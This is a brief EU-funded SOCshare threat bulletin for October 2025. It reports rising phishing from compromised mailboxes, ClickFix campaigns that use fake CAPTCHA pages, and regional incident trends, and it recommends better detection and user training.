SOCshare: cybersecurity landscape in October 2025

SOCshare: cybersecurity landscape in October 2025

October 2025 revealed continued escalation in social engineering attacks – particularly phishing. Furthermore, ClickFix attacks remained on TOP, and quite successful, since a high number of infected users was noticed.

More about SOCshare

Phishing attempts on the rise

During October we have repeatedly witnessed multiple phishing attempts. Content involved various techniques – from malware delivery, to phishing links for credentials harvesting. One thing stood out – is that more phishing e-mails come from legitimate, but compromised mailboxes. This helps attackers evade detections and spam filter.

ClickFix attacks

ClickFix attacks remained present, active, and notably successful throughout October 2025, continuing to exploit user trust and habitual behavior. These campaigns mostly relied on fake Cloudflare CAPTCHA pages, which were used to create a false sense of legitimacy. Victims were typically instructed to “verify” access or “fix” an issue by clicking through the CAPTCHA, ultimately leading them to execute malicious commands.

What Else Happened in October 2025?

Rise in cyber incidents across Europe and Baltic countries. Estonia recorded 1057 incidents with an impact, which is a higher indicator than the average of the last six months.
Lithuania hosted a national cybersecurity forum, where leaders and tech experts discussed increasing threats and deepened international cooperation.

Key takeaways

Phishing remains the dominant entry point

Phishing campaigns are increasingly originating from legitimate but compromised mailboxes, significantly improving attacker success rates by bypassing traditional spam filters and trust-based email defenses. Further trainings are required for users to stay informed and trained.

ClickFix attacks remain highly active

Having in mind its effectiveness there is a high demand to talk about these types of attacks and educate users to not fall for such attacks.

Where to pay attention to

Looking Ahead

Organizations should focus on:

Improving detection mechanisms for ClickFix type of attacks
Improving resiliency via trainings and education of users, how to recognize tactics used by threat actors.

October 2025 showed how threat actors are innovating within familiar attack vectors like phishing while also diversifying their tactics with advanced malware capabilities. Traditional defenses based solely on signatures or blacklists are increasingly insufficient.
Behavioral and contextual detection, combined with human awareness and regional cooperation, are now essential pillars of a resilient cybersecurity posture.

References

This entry is published as part of the SOCshare project (No. 101145843), which we are running together with Vilnius City Municipality. It is partly funded by the European Union. The views and opinions expressed are those of the authors alone and do not necessarily reflect those of the European Union or the European Cyber Security Centre of Excellence. Neither the European Union nor the European Cyber Security Centre of Excellence can be held responsible for them.

SOCshare: cybersecurity landscape in October 2025